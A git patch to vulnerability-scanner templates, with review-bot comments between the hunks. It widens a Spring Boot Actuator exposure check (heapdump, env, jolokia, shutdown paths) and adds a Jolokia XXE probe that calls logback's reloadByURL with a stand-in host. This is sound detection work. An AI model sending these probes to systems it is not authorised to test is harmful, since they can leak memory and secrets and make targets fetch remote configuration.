From c167a31784ac843467573380774aaff5ba36f0a2 Mon Sep 17 00:00:00 2001 From: dw1 Date: Thu, 2 Jul 2020 23:14:39 +0700 Subject: [PATCH 1/2] :wrench: Add path requests & matchers for Springboot Actuators --- .../springboot-detect.yaml | 76 ++++++++++++++----- 1 file changed, 57 insertions(+), 19 deletions(-) diff --git a/security-misconfiguration/springboot-detect.yaml b/security-misconfiguration/springboot-detect.yaml index 80bbdcce12..06b35ea211 100644 --- a/security-misconfiguration/springboot-detect.yaml +++ b/security-misconfiguration/springboot-detect.yaml 
@@ -2,38 +2,74 @@ id: springboot-actuators info: name: Detect the exposure of Springboot Actuators - author: that_juan_ + author: that_juan_ & dwisiswant0 severity: medium requests: - method: GET path: - - "{{BaseURL}}/trace" - - "{{BaseURL}}/loggers" - - "{{BaseURL}}/autoconfig" - - "{{BaseURL}}/threaddump" - - "{{BaseURL}}/env" - - "{{BaseURL}}/management" - - "{{BaseURL}}/dump" - - "{{BaseURL}}/configprops" - - "{{BaseURL}}/mappings" - - "{{BaseURL}}/auditevents" - - "{{BaseURL}}/beans" - - "{{BaseURL}}/cloudfoundryapplication" - - "{{BaseURL}}//jolokia" - "{{BaseURL}}/actuator" - "{{BaseURL}}/actuator/auditevents" + - "{{BaseURL}}/actuator/auditLog" - "{{BaseURL}}/actuator/beans" - - "{{BaseURL}}/actuator/health" + - "{{BaseURL}}/actuator/caches" - "{{BaseURL}}/actuator/conditions" - "{{BaseURL}}/actuator/configprops" - - "{{BaseURL}}/actuator/env" + - "{{BaseURL}}/actuator/configurationMetadata" - "{{BaseURL}}/actuator/dump" - - "{{BaseURL}}/actuator/threaddump" + - "{{BaseURL}}/actuator/env" + - "{{BaseURL}}/actuator/events" + - "{{BaseURL}}/actuator/exportRegisteredServices" + - "{{BaseURL}}/actuator/features" - "{{BaseURL}}/actuator/flyway" + - "{{BaseURL}}/actuator/health" + - "{{BaseURL}}/actuator/healthcheck" + - "{{BaseURL}}/actuator/heapdump" + - "{{BaseURL}}/actuator/httptrace" + - "{{BaseURL}}/actuator/hystrix.stream" + - "{{BaseURL}}/actuator/info" - "{{BaseURL}}/actuator/integrationgraph" - - "{{BaseURL}}//actuator/management" - - "{{BaseURL}}//actuator/jolokia" + - "{{BaseURL}}/actuator/jolokia" + - "{{BaseURL}}/actuator/liquibase" + - "{{BaseURL}}/actuator/logfile" + - "{{BaseURL}}/actuator/loggers" + - "{{BaseURL}}/actuator/loggingConfig" + - "{{BaseURL}}/actuator/management" + - "{{BaseURL}}/actuator/mappings" + - "{{BaseURL}}/actuator/metrics" + - "{{BaseURL}}/actuator/refresh" + - "{{BaseURL}}/actuator/registeredServices" + - "{{BaseURL}}/actuator/releaseAttributes" + - "{{BaseURL}}/actuator/resolveAttributes" + - 
"{{BaseURL}}/actuator/scheduledtasks" + - "{{BaseURL}}/actuator/sessions" + - "{{BaseURL}}/actuator/shutdown" + - "{{BaseURL}}/actuator/springWebflow" + - "{{BaseURL}}/actuator/sso" + - "{{BaseURL}}/actuator/ssoSessions" + - "{{BaseURL}}/actuator/statistics" + - "{{BaseURL}}/actuator/status" + - "{{BaseURL}}/actuator/threaddump" + - "{{BaseURL}}/actuator/trace" + - "{{BaseURL}}/auditevents" + - "{{BaseURL}}/autoconfig" + - "{{BaseURL}}/beans" + - "{{BaseURL}}/cloudfoundryapplication" + - "{{BaseURL}}/configprops" + - "{{BaseURL}}/dump" + - "{{BaseURL}}/env" + - "{{BaseURL}}/health" + - "{{BaseURL}}/heapdump" + - "{{BaseURL}}/hystrix.stream" + - "{{BaseURL}}/info" + - "{{BaseURL}}/jolokia" + - "{{BaseURL}}/jolokia/list" + - "{{BaseURL}}/loggers" + - "{{BaseURL}}/management" + - "{{BaseURL}}/mappings" + - "{{BaseURL}}/metrics" + - "{{BaseURL}}/threaddump" + - "{{BaseURL}}/trace" matchers: - type: regex part: body @@ -44,6 +80,8 @@ requests: - "system" - "database" - "cron" + - "reloadByURL" + - "JMXConfigurator" condition: or - type: status status: From ecd295aff49fc0eb836b77a2a9297b83c6af4110 Mon Sep 17 00:00:00 2001 From: dw1 Date: Thu, 2 Jul 2020 23:15:33 +0700 Subject: [PATCH 2/2] :fire: Add Springboot Actuators (Jolokia) XXE Vulnerability --- .../springboot-actuators-jolokia-xxe.yaml | 28 +++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 vulnerabilities/springboot-actuators-jolokia-xxe.yaml diff --git a/vulnerabilities/springboot-actuators-jolokia-xxe.yaml b/vulnerabilities/springboot-actuators-jolokia-xxe.yaml new file mode 100644 index 0000000000..31723c324d --- /dev/null +++ b/vulnerabilities/springboot-actuators-jolokia-xxe.yaml 
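Review bot: The new `/actuator/heapdump` and `/heapdump` paths make a detection template pull a full JVM heap dump from every target that exposes it, and `/actuator/hystrix.stream` / `/hystrix.stream` are server-sent-event streams that do not terminate, so those GET probes will hang until the request timeout and put real load on the target; drop them from the detect template or probe them in a dedicated template. `/actuator/shutdown` and `/actuator/refresh` are state-changing endpoints that Spring Boot only honors on POST, so a GET should only confirm presence, but that should be written down, e.g. `# shutdown/refresh are POST-only write operations; GET here only checks presence`. The request's matchers continue past this hunk.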
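Review bot: `reloadByURL` and `JMXConfigurator` are appended to the OR'd body-regex list, but no `matchers-condition` is visible in this request, so the regex matcher and the status matcher below it are presumably also OR'd (nuclei's default), meaning a plain 200 from any of the roughly seventy paths — `/info`, `/health`, `/status` on an app with a catch-all route — already fires regardless of these words. If these strings are meant to confirm Jolokia/logback exposure rather than widen the net, consider `matchers-condition: and` at the request level so a hit requires both the status and a body signature. Both added entries are literals without regex metacharacters, so they are safe under `type: regex` as written.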
@@ -0,0 +1,28 @@ +id: springboot-actuators-jolokia-xxe + +info: + name: Spring Boot Actuators (Jolokia) XXE + author: dwisiswant0 + severity: high + +requests: + - method: GET + path: + - "{{BaseURL}}:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/nonexistent:31337!/logback.xml" + - "{{BaseURL}}/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/nonexistent:31337!/logback.xml" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "http:\\/\\/nonexistent:31337\\/logback.xml" + - "reloadByURL" + - "JoranException" + condition: and + part: body + - type: word + words: + - "X-Application-Context" + part: header \ No newline at end of file
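Review bot: The first path appends `:8090` to `{{BaseURL}}`, so a target supplied with an explicit port (`http://host:8080`) is rewritten to `http://host:8080:8090/jolokia/...`, an invalid host:port; either drop that line and let the operator supply the management port as part of the target, or note the assumption in a comment. The header matcher that requires `X-Application-Context` under `matchers-condition: and` will miss Spring Boot 2.x, which no longer sends that header, so the template only reports legacy 1.x instances; consider removing the header matcher or keeping it as a non-required signal. The body word `"http:\\/\\/nonexistent:31337\\/logback.xml"` reads like a regex escape but is a `type: word` literal, so add `# word (not regex) matcher: Jolokia's JSON output escapes "/" as "\/"` above it. The probe also makes the target resolve and attempt to fetch `nonexistent:31337` before logback raises `JoranException`, i.e. it has an outbound side effect on the target even though the host does not exist, which is worth stating in `info` so operators know what the scan triggers.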